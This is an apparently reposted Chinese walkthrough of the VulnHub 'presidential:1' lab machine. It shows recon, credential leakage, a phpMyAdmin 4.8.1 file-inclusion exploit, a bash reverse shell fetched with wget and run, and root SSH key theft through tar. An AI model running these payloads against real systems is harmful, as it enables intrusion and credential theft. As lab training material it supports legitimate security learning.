0x00靶机信息
靶机:presidential:1
难度:中-难
下载:https://www.vulnhub.com/entry/presidential-1,500/
0x01信息收集
靶场网段:192.168.250.0/24
Nmap扫描靶场网段,寻找目标靶机IP以及相关端口以及服务
1
2
|
nmap -sn 192.168.250.0/24 nmap -sV -p- 192.168.250.132 |
IP:192.168.250.132
端口:80(http)2082(ssh)
打开网站,果不其然也是个静态页面,但是页面内有个邮箱,邮箱的域名我们本地改host绑定一下
1
|
nikto -h http://votenow.local |
1
|
python3 dirsearch.py -u http://votenow.local -e php |
config.php.bak同样的一片空白,但是在源码内,有一些重要信息
是数据库的账号密码,但是数据库页面还没见到个影,爆破一下子域名试试
1
|
wfuzz |
用config.php.bak里的账号密码登入
user表有一个账号密码加密了,使用john解密
1
|
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt john.txt |
0x02漏洞利用
phpmyadmin的版本为4.8.1,这个版本有本地包含漏洞
开始利用
SQL执行
1
|
select '<? php phpinfo();exit;?>' |
然后包含session
1
|
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_4ribtr9diq98423tqfja79srek4ol8sj |
创建反弹文件
1
|
cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.250.129/1100 0>&1' > shell.s |
再执行SQL命令
1
|
select '<? php system("wget 192.168.250.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>' |
nc开始监听
1
|
nc -lvv 1100 |
解决shell输入字母会变成双写
1
|
python -c 'import pty; pty.spawn("/bin/bash")' |
0x03提权
我们切换用户到admin用户,密码是Stella,之前user表解密出来的
尝试提权,sudo提权失败,根目录的notes.txt文件提示的大概意思就是让我们使用压缩的命令
使用tars
1
2
3
4
|
tarS -cvf key.tar /root/.ssh/id_rsa tar -xvf key.tar cd root/.ssh ssh -i id_rsa root@localhost -p 2082 |
至此通关
来源:freebuf.com 2020-08-19 03:36:24 by: 听闻瓜子Max
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册